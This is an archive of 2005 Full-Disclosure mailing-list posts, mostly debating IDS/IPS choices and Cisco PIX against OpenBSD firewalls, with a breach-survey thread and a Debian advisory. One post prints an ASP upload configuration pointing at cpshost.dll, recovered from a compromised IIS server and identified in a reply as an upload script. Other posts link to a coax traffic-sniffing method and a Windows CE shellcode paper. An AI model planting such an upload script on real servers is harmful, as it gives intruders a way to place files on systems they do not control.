That's the first non-CISCO, non-sponsored link I got googling for 'PIX-501'.

http://stores.tomshardware.com/search_getprod.php/masterid=515798//
has a 50 user bundle for $489.

http://stores.tomshardware.com/search_getprod.php/masterid=923020
has a 50->unlimited upgrade for $158.  Add to previous for $647.

A lot of sites don't need the "unlimited" license, because they don't have
over 50 IPs on the LAN.

And remember to calculate the TCO - you roll-your-own PC for under $400, you're
not going to be getting as much beefy, and I didn't see any discussion of what
a PIX admin will cost you versus the expense of finding an OpenBSD person -
especially down in the "We only have 10-25 people with PCs" arena where you'll
be lucky to have a budget for a McSE (you want fries with that?)

(In the interests of fairness, you don't need much beefy if you're Cisco -
the listed technical specs on the innards of the PIX-501:

Processor: 133-MHz AMD SC520 Processor
Random access memory: 16 MB of SDRAM
Flash memory: 8 MB
System bus: Single 32-bit, 33-MHz PCI

Comparing the rated 60Mbytes/sec with that system bus, and the fact that
traditional designs will require at least 2 PCI accesses per (one inbound
from ethernet to memory, and one outbound from memory to the ethernet), and
it becomes clear that there's some major black magic - 2 PCI cycles per only
leaves them 6MBytes/second of PCI bandwidth (and more importantly, also means
that you need to have enough smarts to keep the inbound pipe drained and the
outbound pipe full all the time)



Re: [Full-disclosure] Is the Bottom Line Impacted by Security Breaches?

2005-09-28 Thread Michael Holstein

In the paper I ask: "If 40 million customer credit card numbers are
exposed in a security breach at the credit card processor CardSystems, why
do a significant number of people not cancel their Visa and/or
Mastercard?"


Simple .. because Mastercard/Visa got to avoid having to notify their 
customers of the breach :


http://www.consumeraffairs.com/news04/2005/cardsystems_court.html

~Mike.


Re: [Full-disclosure] Suggestion for IDS

2005-09-28 Thread Lew Wolfgang

Hi Kevin,

Yes, they will give you a no-extra-cost Windows-based program
to create custom rules.  We've got one, but I haven't
used it yet.  I'm still brushing up on my Regex...

Regards,
Lew

Kevin Pawloski wrote:
Does the Tipping Point appliance allow you to create custom rules now? 
The last time I tried the appliance (which was over a year ago) that 
'feature' was not yet available.


Kevin

On 9/28/05, *Paul Schmehl* <[EMAIL PROTECTED] 
> wrote:


--On Wednesday, September 28, 2005 15:54:41 +0700 Fajar Edisya Putera
<[EMAIL PROTECTED] > wrote:

 > Dear Experts,
 >
 > Our company plans to install an IDS to protect our resources. I've already
 > read about Snort as a NIDS, but that's software-based. I'm interested in a
 > hardware-based one that will work transparently with our Cisco PIX, with no
 > need to make changes in our firewall. What's your suggestion?
 >
I can highly recommend Tippingpoint.  It's as close to a set-and-forget IPS
as I've seen, and it's capable of handling large bandwidth requirements
without bogging down (assuming you've bought the right appliance for your
bandwidth requirements.)

Paul Schmehl ([EMAIL PROTECTED] )
Adjunct Information Security Officer
University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu/ir/security/


Re: [Full-disclosure] Suggestion for IDS

2005-09-28 Thread Michael Holstein
I suspect the argument here has to be cost-for-cost - in the price range for a 
decent beefy OpenBSD box you aren't going to be using FWSMs, and I can quite 
believe that the PIXen in that price range don't perform - the PIX 501 is 
specced at 60MB/s throughput and the cheapest retail price I can find for it 
is $678 for the unlimited license version - for the same money you can get a 
beefy PC which will push quite a bit more than 60MB/s


Okay .. I'll bite.

That 501 is also the size of two decks of cards, laid side-by-side .. 
and will run tirelessly without any intervention for years (it doesn't 
even have a fan). I've personally deployed HUNDREDS of these things and 
never yet seen one go bad without help from lightning. PC power 
supplies, on the other hand .. frequently fall victim to dustbunnies.


I can also FedEx a replacement 501 to timbuktu for no more than $30 (it's 
like 5lbs well-packaged) .. and get it there by 8am the next day. GROUND 
service on a whole PC is around twice that.


FWSMs appear to retail around $23,000 - that's on top of the 6500 chassis and 
line cards you need to use it - not exactly a fair comparison.


Yeah, but who pays retail for Cisco gear? .. Everywhere I've worked, 
we've been at close to half of list -- and you get loads of Cisco people 
that'll happily assist with your (no matter how ridiculous) config -- 
they even usually speak English (usually...).


For that money you could quite easily put together a farm of boxes that would 
exceed 5GB/s throughput aggregate - whether you'd want to is a different 
question.


Yeah .. you could fill a 19" rack full of servers and accomplish the 
same thing .. but I highly doubt you'd end up accomplishing the same 
reliability (and to do 5gb, you'd only really need a 6503, SUP-2, and 
whatever interface card you want to use -- although you could get away 
using the two gig ports on the sup).


As for cost .. keep in mind what type of interfaces, RAID, memory, etc 
you've got to have to accomplish 5gb ... you can't just slap a 5 gigE 
cards on your PCI bus and expect not to have interrupt and PCI bandwidth 
issues.


Besides .. when we're talking "enterprise-class" networking, what would 
you rather have? .. two racks of BSD boxes with all sorts of complicated 
tricks to keep them load-balanced and redundant? .. or two 6503s where 
you can upgrade the IOS in 5 minutes and hot-swap anything?.


~Mike.


Re: [Full-disclosure] Suggestion for IDS

2005-09-28 Thread Paul S. Brown
On Wednesday 28 September 2005 16:56, Michael Holstein wrote:
> > If you NAT a lot, PIX can't handle the load.  It also isn't flexible
> > enough.
>
> Huh? .. the FWSM (which is PIX and you can have 4 of them in a chassis)
> can handle 100 interfaces, 5gbps, 100k CPS, and 1M concurrent per blade.
>
> http://www.cisco.com/en/US/products/hw/modules/ps2706/ps4452/
>
> Show me an OpenBSD system that can handle 400 interfaces, 20gbps, and 4M
> connections (and can do HSRP, etc).
>
> (I'm not trying to start an open-source "holy war" on a newsgroup .. I
> use pf too, where I need the granularity -- just not on the whole network).

I suspect the argument here has to be cost-for-cost - in the price range for a 
decent beefy OpenBSD box you aren't going to be using FWSMs, and I can quite 
believe that the PIXen in that price range don't perform - the PIX 501 is 
specced at 60MB/s throughput and the cheapest retail price I can find for it 
is $678 for the unlimited license version - for the same money you can get a 
beefy PC which will push quite a bit more than 60MB/s

FWSMs appear to retail around $23,000 - that's on top of the 6500 chassis and 
line cards you need to use it - not exactly a fair comparison.

For that money you could quite easily put together a farm of boxes that would 
exceed 5GB/s throughput aggregate - whether you'd want to is a different 
question.


P.


Re: [Full-disclosure] Suggestion for IDS

2005-09-28 Thread Kevin Pawloski
Does the Tipping Point appliance allow you to create custom rules now?
The last time I tried the appliance (which was over a year ago) that
'feature' was not yet available.

Kevin

On 9/28/05, Paul Schmehl <[EMAIL PROTECTED]> wrote:
--On Wednesday, September 28, 2005 15:54:41 +0700 Fajar Edisya Putera
<[EMAIL PROTECTED]> wrote:
> Dear Experts,
>
> Our company plan to install IDS to protect our resources, I'm already
> read about snort as NIDS, but, that's software based. I'm interesting
> with hardware based that will work transparently with our Cisco PIX, no
> need to make changes in our firewall. What's your suggestion.
>
I can highly recommend Tippingpoint.  It's a close to a set and forget IPS
as I've seen, and it's capable of handling large bandwidth requirements
without bogging down (assuming you've bought the right appliance for your
bandwidth requirements.)

Paul Schmehl ([EMAIL PROTECTED])
Adjunct Information Security Officer
University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu/ir/security/

RE: [Full-disclosure] Suggestion for IDS

2005-09-28 Thread Vitor Ventura
I'm not so sure that FWSM runs PIXOS, but with all those interfaces, think about 
the rules management nightmare.

-Original Message- 
From: Michael Holstein [mailto:[EMAIL PROTECTED] 
Sent: Wed 28-09-2005 16:56 
To: full-disclosure@lists.grok.org.uk 
Cc: 
Subject: Re: [Full-disclosure] Suggestion for IDS




> If you NAT a lot, PIX can't handle the load.  It also isn't flexible
> enough.

Huh? .. the FWSM (which is PIX and you can have 4 of them in a chassis)
can handle 100 interfaces, 5gbps, 100k CPS, and 1M concurrent per blade.

http://www.cisco.com/en/US/products/hw/modules/ps2706/ps4452/

Show me an OpenBSD system that can handle 400 interfaces, 20gbps, and 4M
connections (and can do HSRP, etc).

(I'm not trying to start an open-source "holy war" on a newsgroup .. I
use pf too, where I need the granularity -- just not on the whole 
network).

~Mike.

Re: [Full-disclosure] Suggestion for IDS

2005-09-28 Thread Paul S. Brown
On Wednesday 28 September 2005 16:56, Michael Holstein wrote:
> > If you NAT a lot, PIX can't handle the load.  It also isn't flexible
> > enough.
>
> Huh? .. the FWSM (which is PIX and you can have 4 of them in a chassis)
> can handle 100 interfaces, 5gbps, 100k CPS, and 1M concurrent per blade.
>
> http://www.cisco.com/en/US/products/hw/modules/ps2706/ps4452/
>
> Show me an OpenBSD system that can handle 400 interfaces, 20gbps, and 4M
> connections (and can do HSRP, etc).
>
> (I'm not trying to start an open-source "holy war" on a newsgroup .. I
> use pf too, where I need the granularity -- just not on the whole network).

I suspect the argument here has to be cost-for-cost - in the price range for a 
decent beefy OpenBSD box you aren't going to be using FWSMs, and I can quite 
believe that the PIXen in that price range don't perform - the PIX 501 is 
specced at 60MB/s throughput and the cheapest retail price I can find for it 
is $678 for the unlimited license version - for the same money you can get a 
beefy PC which will push quite a bit more than 60MB/s

FWSMs appear to retail around $23,000 - that's on top of the 6500 chassis and 
line cards you need to use it - not exactly a fair comparison.

For that money you could quite easily put together a farm of boxes that would 
exceed 5GB/s throughput aggregate - whether you'd want to is a different 
question.


P.


[Full-disclosure] Is the Bottom Line Impacted by Security Breaches?

2005-09-28 Thread Kenneth F. Belva
White and Case, a top NYC law firm, posted a survey on Data Security
Breach Notifications on September 26, 2005.

From the press release: "Victims of personal data security breaches are
showing their displeasure by terminating relationships with the companies
that maintained their data, according to a new national survey sponsored
by global law firm White & Case. The independent survey of nearly 10,000
adults, conducted by the respected privacy research organization Ponemon
Institute, reveals that nearly 20 percent of respondents say they have
terminated a relationship with a company after being notified of a
security breach."

White and Case Press release:
http://www.whitecase.com/news/news_detail.aspx?newsid=11731&type=News%20Releases

White and Case Paper:
http://www.whitecase.com/files/tbl_s5107Materials/FileUpload5837/151/Security_Breach_Survey.pdf


My research takes a macro approach: "The keynote address will cover
reputational risk in light of recent disclosures of high profile security
incidents at such institutions as CitiFinancial (Citigroup), Bank of
America and Wachovia, Choicepoint, DSW Shoe Warehouse and Polo Ralph
Lauren. The presentation will create a framework for understanding
reputational risk in light of these recent events that may be applicable
to responding to future incidents."

In the paper I ask: "If 40 million customer credit card numbers are
exposed in a security breach at the credit card processor CardSystems, why
do a significant number of people not cancel their Visa and/or
Mastercard?"

Reputational Risk Keynote Presentation:
http://www.ftusecurity.com/pub/FiTechSummit_final_paper.pdf

I am concerned that the survey is self-selecting. In other words, the
people responding to the survey already have a disposition one way or the
other. Of 51,433 people, only 17.8% (9,154) replied. That means 82.2%
(42,279) did not reply!

I'm not a statistician; is 17.8% statistically significant to determine a
general consensus?

The papers may not be directly contradictory to one another. Please keep
that in mind.

I would be interested to know other's opinions on the matter.

Sincerely,
Kenneth F. Belva, CISSP
http://www.ftusecurity.com



Re: [Full-Disclosure] (no subject) cpshost.dll

2005-09-28 Thread Vitor Ventura
This is a DLL used by IIS to handle POST requests; it can be used to upload files.

RE: [Full-disclosure] Suggestion for IDS

2005-09-28 Thread Jan Nielsen
Hi Paul

Can I ask what you were doing that a PIX could not handle NAT-wise?
Just wondering since I have done very extensive and complex NATing in
PIXes from 506's up to 535's without any performance problems.

Jan

-Original Message-
From: Paul Schmehl [mailto:[EMAIL PROTECTED] 
Sent: 28. september 2005 17:49
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Suggestion for IDS 

--On Wednesday, September 28, 2005 11:37:38 -0400
[EMAIL PROTECTED] 
wrote:

> On Wed, 28 Sep 2005 07:01:34 EDT, "J. Oquendo" said:
>
>> While I do agree with the statement made "Quite frankly, anybody who
>> already has a PIX installed and wants to install an IPS needs to quantify
>> *exactly* what protection the PIX is failing to provide before they go
>> shopping for anything" to a degree, I also disagree with that statement
>> since it alludes to the thinking that solely a PIX will save your ass. It
>> won't, nor will any other firewall, nor will any other product combined
>> with any OTHER product and so on.
>
> Obviously, the original poster isn't thinking that a PIX will save their
> ass, because they're in the market for something in addition :)
>
> They should be figuring out *why* they need more protection (quite
> frankly, for many places, a *properly configured and maintained* PIX is
> quite sufficient),

Not only was the PIX (for us) not sufficient, it wasn't robust enough. 
We're ditching our PIXes for OpenBSD and pf.

If you NAT a lot, PIX can't handle the load.  It also isn't flexible
enough.

Paul Schmehl ([EMAIL PROTECTED])
Adjunct Information Security Officer
University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu/ir/security/


Re: [Full-disclosure] Suggestion for IDS

2005-09-28 Thread Michael Holstein


If you NAT a lot, PIX can't handle the load.  It also isn't flexible 
enough.


Huh? .. the FWSM (which is PIX and you can have 4 of them in a chassis) 
can handle 100 interfaces, 5gbps, 100k CPS, and 1M concurrent per blade.


http://www.cisco.com/en/US/products/hw/modules/ps2706/ps4452/

Show me an OpenBSD system that can handle 400 interfaces, 20gbps, and 4M 
connections (and can do HSRP, etc).


(I'm not trying to start an open-source "holy war" on a newsgroup .. I 
use pf too, where I need the granularity -- just not on the whole network).


~Mike.


Re: [Full-disclosure] Suggestion for IDS

2005-09-28 Thread Paul Schmehl
--On Wednesday, September 28, 2005 11:37:38 -0400 [EMAIL PROTECTED] 
wrote:



On Wed, 28 Sep 2005 07:01:34 EDT, "J. Oquendo" said:


While I do agree with the statement made "Quite frankly, anybody who
already has a PIX installed and wants to install an IPS needs to quantify
*exactly* what protection the PIX is failing to provide before they go
shopping for anything" to a degree, I also disagree with that statement
since it alludes to the thinking that solely a PIX will save your ass. It
won't, nor will any other firewall, nor will any other product combined
with any OTHER product and so on.


Obviously, the original poster isn't thinking that a PIX will save their
ass, because they're in the market for something in addition :)

They should be figuring out *why* they need more protection (quite
frankly, for many places, a *properly configured and maintained* PIX is
quite sufficient),


Not only was the PIX (for us) not sufficient, it wasn't robust enough. 
We're ditching our PIXes for OpenBSD and pf.


If you NAT a lot, PIX can't handle the load.  It also isn't flexible enough.

Paul Schmehl ([EMAIL PROTECTED])
Adjunct Information Security Officer
University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu/ir/security/


Re: [Full-disclosure] Suggestion for IDS

2005-09-28 Thread Paul Schmehl
--On Wednesday, September 28, 2005 15:54:41 +0700 Fajar Edisya Putera 
<[EMAIL PROTECTED]> wrote:



Dear Experts,

Our company plans to install an IDS to protect our resources. I've already
read about Snort as a NIDS, but that's software-based. I'm interested in a
hardware-based one that will work transparently with our Cisco PIX, with no
need to make changes in our firewall. What's your suggestion?

I can highly recommend Tippingpoint.  It's as close to a set-and-forget IPS 
as I've seen, and it's capable of handling large bandwidth requirements 
without bogging down (assuming you've bought the right appliance for your 
bandwidth requirements.)


Paul Schmehl ([EMAIL PROTECTED])
Adjunct Information Security Officer
University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu/ir/security/


Re: [Full-disclosure] Suggestion for IDS

2005-09-28 Thread Valdis . Kletnieks
On Wed, 28 Sep 2005 07:01:34 EDT, "J. Oquendo" said:

> While I do agree with the statement made "Quite frankly, anybody who
> already has a PIX installed and wants to install an IPS needs to quantify
> *exactly* what protection the PIX is failing to provide before they go
> shopping for anything" to a degree, I also disagree with that statement
> since it alludes to the thinking that solely a PIX will save your ass. It
> won't, nor will any other firewall, nor will any other product combined
> with any OTHER product and so on.

Obviously, the original poster isn't thinking that a PIX will save their ass,
because they're in the market for something in addition :)

They should be figuring out *why* they need more protection (quite frankly, for
many places, a *properly configured and maintained* PIX is quite sufficient),
and exactly what areas they want extra protection.  Amazingly enough, people
who will look at their current car and say "I need a new one, and it needs to
have X, Y, and Z, and maybe W if it adds less than $500 to the bottom-line price"
seem to be unable to do similar rational analysis when they go shopping for
security gear.



Re: [Full-disclosure] (no subject)

2005-09-28 Thread Ademar Gonzalez
Hi Aditya

On 9/28/05, Aditya Deshmukh
<[EMAIL PROTECTED]> wrote:
> Recently 2 days ago I saw this in a compromised system.
>
>
> Both this file and cpshost.dll were deleted from C:\InetPub\scripts
> This file was recovered but I was unable to recover cpshost.dll
>
>
> Anyone know what this is?
>

It is an upload script; cpshost.dll is the Posting Acceptor ActiveX control:

http://support.microsoft.com/kb/q230298/


>
> <% Response.Buffer = TRUE %>
>
> Version=1.5
> <%
> PathToPA = "http://" + Request.ServerVariables("SERVER_NAME") +
> "/scripts/cpshost.dll"
>
>
> PostingURL = PathToPA + "?PUBLISH"
>
> TargetURL = "http://" + Request.ServerVariables("SERVER_NAME")
> %>
>
> [{8B14B770-748C-11D0-A309-00C04FD7CFC5}]
> PostingURL="<%= PostingURL %>"
> TargetURL="<%= TargetURL %>"
> ComponentInstall="yes"
>

ciao ciao
ademar


Re: [Full-disclosure] O-O-O

2005-09-28 Thread Colin
On 27/09/05, Frank de Wit <[EMAIL PROTECTED]> wrote:

Couldn't help noticing your name is kinda "F-Wit" lol (sorry)


Re: [Full-disclosure] Suggestion for IDS

2005-09-28 Thread Joel Esler
Take a look at Sourcefire's (The company who makes Snort) IPS products.

Joel Esler

(PS. Disclaimer: I work for Sourcefire, and am biased to
Sourcefire/Snort's products)

On 9/28/05, Michael Holstein <[EMAIL PROTECTED]> wrote:
> > Really? Is there no software package capable of withholding inspected
> > packages until cleared by said IDS?
>
> Um .. snort-inline anyone?
>
> Michael Holstein CISSP GCIA
> Cleveland State University


Re: [Full-disclosure] Suggestion for IDS

2005-09-28 Thread Michael Holstein
Our company plans to install an IDS to protect our resources. I've already 
read about Snort as a NIDS, but that's software-based. I'm interested in a 
hardware-based one that will work transparently with our Cisco PIX, with no 
need to make changes in our firewall. What's your suggestion?


My first piece of advice on this is to ignore any company that says they 
deliver a "turnkey" solution. Such a thing doesn't exist.


Any IDS will work with any firewall .. unless, of course, you want to 
connect the two together (eg: dynamically ACL the PIX based on what the 
IDS sees). That, IMHO, is an invitation to DoS yourself (think .. I 
spoof a packet that --looks like an attack-- from your upstream router, 
or smtp server, etc). There's dozens of ways to do this, including free 
with snort.


You can also examine snort's "inline" mode in which you set up bridging 
between two interfaces, and let snort "decide" which packets to forward. 
In order to make such a thing redundant, be prepared to do some fancy 
H/A stuff with a pair of servers.


And don't forget .. an IDS is certainly not "fix and forget" .. it 
requires daily tinkering (new sigs come out daily .. and they're almost 
always noisy and require tuning). In most any decent sized network, 
having a dedicated admin to chase the IDS alerts and keep an eye on 
things is almost a given.


And as for having an IDS "protect" your network .. well .. forget that. 
An IDS is great for statistical research and forensics .. but with 
botnets and whatnot going SSL, your time/resources are much better 
spent finding your vulnerabilities and patching your hosts.


My $0.02.


Cheers,

Michael Holstein CISSP GCIA
Cleveland State University


Re: [Full-disclosure] Suggestion for IDS

2005-09-28 Thread Michael Holstein
> Really? Is there no software package capable of withholding inspected 
> packages until cleared by said IDS?


Um .. snort-inline anyone?

Michael Holstein CISSP GCIA
Cleveland State University


[Full-disclosure] (no subject)

2005-09-28 Thread Aditya Deshmukh
Two days ago I saw this on a compromised system. 


Both this file and cpshost.dll were deleted from C:\InetPub\scripts.
This file was recovered, but I was unable to recover cpshost.dll. 


Anyone know what this is? 






<% Response.Buffer = TRUE %>

Version=1.5
<%
PathToPA = "http://" + Request.ServerVariables("SERVER_NAME") + "/scripts/cpshost.dll"

PostingURL = PathToPA + "?PUBLISH"

TargetURL = "http://" + Request.ServerVariables("SERVER_NAME")
%>

[{8B14B770-748C-11D0-A309-00C04FD7CFC5}]
PostingURL="<%= PostingURL %>"
TargetURL="<%= TargetURL %>"
ComponentInstall="yes"


Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com)


[Full-disclosure] Exploring Windows CE Shellcode

2005-09-28 Thread Tim Hurman
Hi,

I have just had chance to put a paper I wrote a little while ago online. 
It discusses the problems involved in writing shellcode for Windows CE/ARM
and goes on to develop an exploit. The full source for the exploit and 
related utilities is included.

http://www.pentest.co.uk/cgi-bin/viewcat.cgi?cat=whitepapers&section=04_embedded

Tim.

-- 
Tim Hurman - IT Security Consultant - Pentest ltd.
Email disclaimer: http://www.pentest.co.uk/legal.shtml#emailpolicy



Re: [Full-disclosure] CORE-Impact license bypass

2005-09-28 Thread sk
>what i criticize is that *lots* of companies (at least here in my
>vicinity) are selling cheap "vulnerability assessments" which actually
>are nothing more than automated security scans. this leads to the
>customer feeling safe when he's really wide open to attacks. often,
>these people's networks can be rooted in no time.
>sure, you don't have to be uber-31337 to do penetration tests (i'm
>certainly not), but it should definitely go beyond the
>"scan--+--google-for-exploit" approach.

i totally agree on that. another thing i have to say is that you can sell
your auto penetration tests, but those which advertise with *professional*
pen-tests should actually know how to exploit a bug and understand the
concept and not just run an automated tool, as that's simply a rip-off of
the customer. too many of those consultants just do the bullshit talking to
convince the customer to keep buying their services. they don't need to
know much.. and certainly don't. every real professional can't do his job
without manual work. that includes auditing custom php/cgi scripts which
were written specifically for the target system, for example, and such
things won't be spotted by the automated tools. this could lead to
undetected command execution, sql injection or info leak bugs on the
customer system, which a hacker will easily spot if he does his usual
manual work. so a pen test is way more reliable and professional if it's
done with real hacking, or do you think real hackers only use automated
tools? script kiddies do, but those are unprofessional clueless kids and
it's the same compared to penetration tests. real pen testers know how to
hack a system and lame ones just run automated tools.

-sk

GroundZero Security Research and Software Development
http://www.groundzero-security.com

We object to the use or transmission of our data for advertising purposes
or for market or opinion research (Section 28(4) BDSG).

pub  1024D/69928CB8 2004-09-27 Stefan Klaas <[EMAIL PROTECTED]>
sub  2048g/2A3C7800 2004-09-27

Key fingerprint = A93E 41F8 7E82 5F2C 3E76  41F1 4BCF 3096 6992 8CB8


This e-mail might contain confidential information. If you are not the right
addressee or you have received this mail in error, please inform the sender as
soon as possible and delete this e-mail immediately. You are not allowed to
make any copies or relay this e-mail.

- Original Message - 
From: "Bernhard Mueller" <[EMAIL PROTECTED]>
To: "Full Disclosure" 
Sent: Wednesday, September 28, 2005 8:58 AM
Subject: Re: [Full-disclosure] CORE-Impact license bypass


> [EMAIL PROTECTED] wrote:
> > On Tue, 27 Sep 2005 17:53:58 +0200, Bernhard Mueller said:
> >
> > And note also that "finding a hole" and "be talented enough to create an
> > exploit" are *totally* distinct.  I found a rather nasty rootable hole
in
> > Sendmail a while back (read the release notes for 8.10.1 and the
relevant
> > manpages for the system linker - that giv

Re: [Full-disclosure] in-line coax monitoring device

2005-09-28 Thread Alex Krycek
greetings comrades...after doing some further research, this is
what I was looking for:

http://sfs.poly.edu/presentations/boris_cable%20modem%20sniff.ppt
http://www.securityfocus.com/news/7977

SB5100 + Blackcat Combo at:
http://www.tcniso.net/ (thanks Mike)

Their "Help" page has the good info...
http://www.tcniso.net/Nav/Help/

Krycek


On Mon, 26 Sep 2005 09:46:21 -0700 Alex Krycek
<[EMAIL PROTECTED]> wrote:
>Good evening...looking for an in-line coax monitoring device that
>will give me the ability to monitor/capture and decode all traffic
>that pass by - any suggestions on how to create one, purchase one,
>sites that sell them or tell you how to build one? Thanks
>- -The Rat
>
>   |
>   |(coax line outside house)
>   |
>   |
>- -- (Demarc)
>   |
>   |
>   |(coax line inside house)
>   |
>   |
>   |
>   |
>   |
>   |
>   |
>- -
>| in-line coax  |
>|  monitoring   |
>| device or tap |
>|   |  ( Ethernet or coax port that  )
>|   -- ( will give me the ability to )
>|   -- ( monitor/capture and decode  )
>|   |  ( all traffic that pass by.   )
>|   |
>|   |
>- -
>   |
>   |
>   |
>   |(coax line going into the cable modem)
>   |
>   |
>   |
> -
> |   |
> |   |
> |   |- (Motorola Cable Modem)
> |   |
> |   |
>/ \
>---
>



[Full-disclosure] [SECURITY] [DSA 821-1] New python2.3 packages fix arbitrary code execution

2005-09-28 Thread Martin Schulze
--------------------------------------------------------------------------
Debian Security Advisory DSA 821-1                       [EMAIL PROTECTED]
http://www.debian.org/security/                             Martin Schulze
September 28th, 2005                    http://www.debian.org/security/faq
--------------------------------------------------------------------------

Package: python2.3
Vulnerability  : integer overflow
Problem type   : remote
Debian-specific: no
CVE ID : CAN-2005-2491
BugTraq ID : 14620
Debian Bug : 324531

An integer overflow with a subsequent buffer overflow has been detected
in PCRE, the Perl Compatible Regular Expressions library, which allows
an attacker to execute arbitrary code, and is also present in Python.
Exploiting this vulnerability requires an attacker to specify the used
regular expression.

The old stable distribution (woody) does not contain python2.3 packages.

For the stable distribution (sarge) this problem has been fixed in
version 2.3.5-3sarge1.

For the unstable distribution (sid) this problem has been fixed in
version 2.3.5-8.

We recommend that you upgrade your python2.3 packages.


Upgrade Instructions
--------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
--------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/p/python2.3/python2.3_2.3.5-3sarge1.dsc
      Size/MD5 checksum:     1146 c9037ce6cf68a2d5df19f97f5a355682
    http://security.debian.org/pool/updates/main/p/python2.3/python2.3_2.3.5-3sarge1.diff.gz
      Size/MD5 checksum:  2351981 7e1a2c22a67933614ae542df35b3acb5
    http://security.debian.org/pool/updates/main/p/python2.3/python2.3_2.3.5.orig.tar.gz
      Size/MD5 checksum:  8512566 9c35e5ca3c487e1c1f70f2fb1ccbfffe

  Architecture independent components:

    http://security.debian.org/pool/updates/main/p/python2.3/idle-python2.3_2.3.5-3sarge1_all.deb
      Size/MD5 checksum:   233926 223cf091cba908e4c0dd60c982399979
    http://security.debian.org/pool/updates/main/p/python2.3/python2.3-doc_2.3.5-3sarge1_all.deb
      Size/MD5 checksum:  2859596 854e1efeddbe977279de799b251a
    http://security.debian.org/pool/updates/main/p/python2.3/python2.3-examples_2.3.5-3sarge1_all.deb
      Size/MD5 checksum:   512922 39616088287ba21d40668128023dd4eb

  Alpha architecture:

    http://security.debian.org/pool/updates/main/p/python2.3/python2.3_2.3.5-3sarge1_alpha.deb
      Size/MD5 checksum:  2996296 ad472f01175b101810f4cd8230ce42ca
    http://security.debian.org/pool/updates/main/p/python2.3/python2.3-dev_2.3.5-3sarge1_alpha.deb
      Size/MD5 checksum:  1754306 e38df20cc079ea0136dc466cb0d4ddcf
    http://security.debian.org/pool/updates/main/p/python2.3/python2.3-gdbm_2.3.5-3sarge1_alpha.deb
      Size/MD5 checksum:    27464 7504460294b6c214660f24b3b1e60821
    http://security.debian.org/pool/updates/main/p/python2.3/python2.3-mpz_2.3.5-3sarge1_alpha.deb
      Size/MD5 checksum:    31240 97a090aa2a0615471f7cfa6a003e474e
    http://security.debian.org/pool/updates/main/p/python2.3/python2.3-tk_2.3.5-3sarge1_alpha.deb
      Size/MD5 checksum:   110618 7b929ad7408161e72ff494fdd91f4d5c

  AMD64 architecture:

    http://security.debian.org/pool/updates/main/p/python2.3/python2.3_2.3.5-3sarge1_amd64.deb
      Size/MD5 checksum:  3036606 e6cfb948cc51ba1016fa72ab1d8d881b
    http://security.debian.org/pool/updates/main/p/python2.3/python2.3-dev_2.3.5-3sarge1_amd64.deb
      Size/MD5 checksum:  1593708 acb2012f860ea2394ce4d59d208e0fff
    http://security.debian.org/pool/updates/main/p/python2.3/python2.3-gdbm_2.3.5-3sarge1_amd64.deb
      Size/MD5 checksum:    27044 349f90ebf6e00a7ec83e3c3414940d9a
    http://security.debian.org/pool/updates/main/p/python2.3/python2.3-mpz_2.3.5-3sarge1_amd64.deb
      Size/MD5 checksum:    31828 94326ce547a1d484713f89baee196f05
    http://security.debian.org/pool/updates/main/p/python2.3/python2.3-tk_2.3.5-3sarge1_amd64.deb
      Size/MD5 checksum:   109686 43f9cbc02557f8ec84c6b5fa0255957f

  ARM architecture:

    http://security.debian.org/pool/updates/main/p/python2.3/python2.3_2.3.5-3sarge1_arm.deb
      Size/MD5 checksum:  2879988 034c30c2424f90fbd31a1403dd9f6a82
    http://security.debian.org/pool/updates/main/p/python2.3/python2.3-dev_2.3.5-3sarge1_arm.deb
      Size/MD5 checksum:  1647238 e12e1d4f9910461132fdabbeca0026d3
    http://security.debian.org/pool/updates/main/p/python2.3/python2.3-gdbm_2.3.5-3sarge1_arm.deb
      Size/MD5 checksum:    26516 97e2e80623f47801e2ec9

Re: [Full-disclosure] Suggestion for IDS

2005-09-28 Thread J. Oquendo

On Wed, 28 Sep 2005 [EMAIL PROTECTED] wrote:

In a nutshell I would go with Sentivist.
http://www.nfr.com/solutions/download/HotPick-IPS-Review.pdf

For brief summaries of some other products:
http://www.networkintrusion.co.uk/inline.htm

> All depends on the inbound packet rate, how fast the IDS is, and how
> much RAM you're willing to buy.  Just remember that a sufficiently long
> queue is in itself a denial of service... ;)

A possibly even worse threat is an out-of-sync admin :O

> Just remember to configure the thing sensibly - it's amazing how many
> people manage to shoot themselves in the foot, and find out the hard way
> that yes, Virginia, there ARE people out there that will forge packets
> with the source IP address of the victim's nameserver... ;)

Many IPS' whether it's a HIP or NIP have (or at least should have)
capabilities of assessing "0-day" threats and generating rules off of
them. Even for those *PS products that do, those same "out of sync" admins
will get lost in the sauce no matter what they buy. Personally I think it
becomes the job of the admin to assess threats and stay in tune with
what's going on in the industry. Keep up to date with any new threats and
step it up from there. "THAT" however becomes a bump in the road since too
many admins are lazy.

> It's *very* important to talk about definitions - there's waaay too many
> people who buy an IDS and think that by hooking it to the net, it
> magically becomes an IPS.

Way too many people also have become accustomed to dropping dollars on the
table of INSERT_CORP_HERE thinking they can buy an all inclusive security
solution only to find that it failed.

> An equally great number buy some IPS or other, and find out the hard way
> that they don't block a 0-day or a new worm.

I'd say from my own experience that someone WITH experience can craft
their own IPS out of an IDS and call it a day, saving money for their company
and possibly creating something equal if not better to some products. On
my little network at work I've managed to substitute many products and
appliances with what's freely available on the open source scene with some
carefully thought-out and diagrammed programs that I audit pretty much
daily.

There's nothing better for me than being able to modify something to my needs
rather than sitting and waiting until vendor_x's next release because they
didn't implement something. It's also better for me to be able to add a
line or two based on some thread about a new attack as opposed to sitting
around and waiting for vendor_x to verify if something is a threat or not.

While I do agree with the statement made "Quite frankly, anybody who
already has a PIX installed and wants to install an IPS needs to quantify
*exactly* what protection the PIX is failing to provide before they go
shopping for anything" to a degree, I also disagree with that statement
since it alludes to the thinking that solely a PIX will save your ass. It
won't, nor will any other firewall, nor will any other product combined
with any OTHER product and so on.

